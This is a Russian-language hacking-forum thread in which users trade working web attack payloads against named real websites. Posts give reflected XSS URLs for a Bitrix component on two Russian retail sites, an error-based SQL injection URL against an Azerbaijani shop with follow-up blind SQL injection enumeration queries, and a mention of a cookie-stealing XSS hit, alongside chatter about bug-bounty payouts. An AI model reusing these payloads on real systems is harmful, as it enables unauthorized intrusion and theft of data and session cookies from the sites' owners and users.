HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 12.10.2021, 17:27
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 665
С нами: 5344886

Репутация: 441


По умолчанию

Код:
https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
 
Ответить с цитированием

  #342  
Старый 21.10.2021, 22:26
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от Octavian  

Получил такой отстук из сервисов Yandex


Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:

на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))

Но было ещё и третье место, откуда он постреливал.

И вот только вчера прилетело письмецо в конверте.
 
Ответить с цитированием

  #343  
Старый 24.10.2021, 21:41
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от erwerr2321  

Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
Но было ещё и третье место, откуда он постреливал.
И вот только вчера прилетело письмецо в конверте.
View attachment 14009
А моя доля? На шаверму
 
Ответить с цитированием

  #344  
Старый 24.10.2021, 21:47
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от Octavian  

А моя доля? На шаверму
Шта?

Я её намного раньше тебя запостил! я ж писал тебе tracking ID и time 1619951822533

Ни гани!
 
Ответить с цитированием

  #345  
Старый 01.11.2021, 16:35
eminlayer7788
Участник форума
Регистрация: 31.07.2015
Сообщений: 111
С нами: 5677526

Репутация: 1
По умолчанию

 
Ответить с цитированием

  #346  
Старый 18.11.2021, 16:02
eminlayer7788
Участник форума
Регистрация: 31.07.2015
Сообщений: 111
С нами: 5677526

Репутация: 1
По умолчанию

sql injection

.SpoilerTarget" type="button">Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Vid...page=2&price=1%27group%20by%20mid(user()%20from%20floor(rand(0)* 2))having%20avg(0)--%20-

and how to get table & column names ?

thanks for help !
 
Ответить с цитированием

  #347  
Старый 25.11.2021, 06:47
ZeV$
Новичок
Регистрация: 08.02.2006
Сообщений: 19
С нами: 10659943

Репутация: 5
По умолчанию

Цитата:
Сообщение от eminlayer7788  

sql injection
Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Vid...page=2&price=1
%27group%20by%20mid(user()%20from%20floor(rand(0)* 2))having%20avg(0)--%20-
and how to get table & column names ?
thanks for help !
digging blind sqli

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9

...

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9

*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
 
Ответить с цитированием

  #348  
Старый 19.02.2022, 15:57
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Пришел мне лог на xsshunter с непонятного сайта, такой вот сайт который парсит но не обрабатывает вывод )

https://www.social-searcher.com/soci...cument.cookie)
 
Ответить с цитированием

  #349  
Старый 23.06.2022, 12:31
eminlayer7788
Участник форума
Регистрация: 31.07.2015
Сообщений: 111
С нами: 5677526

Репутация: 1
По умолчанию

 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.